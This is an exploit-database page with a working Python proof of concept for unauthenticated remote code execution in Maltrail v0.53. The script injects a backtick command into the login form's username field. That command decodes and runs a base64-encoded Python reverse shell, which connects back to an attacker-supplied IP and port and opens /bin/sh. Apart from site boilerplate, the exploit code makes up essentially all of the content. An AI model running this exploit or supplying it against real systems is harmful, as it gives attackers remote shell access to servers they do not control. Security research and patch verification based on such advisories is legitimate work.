Maltrail 0.53 Remote Code Execution

2023.08.11
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) # Exploit Author: Iyaad Luqman K (init_6) # Application: Maltrail v0.53 # Tested on: Ubuntu 22.04 # CVE: CVE-2023-27163 # PoC import sys; import os; import base64; def main(): listening_IP = None listening_PORT = None target_URL = None if len(sys.argv) != 4: print("Error. Needs listening IP, PORT and target URL.") return(-1) listening_IP = sys.argv[1] listening_PORT = sys.argv[2] target_URL = sys.argv[3] + "/login" print("Running exploit on " + str(target_URL)) curl_cmd(listening_IP, listening_PORT, target_URL) def curl_cmd(my_ip, my_port, target_url): payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'' encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64 command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'" os.system(command) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top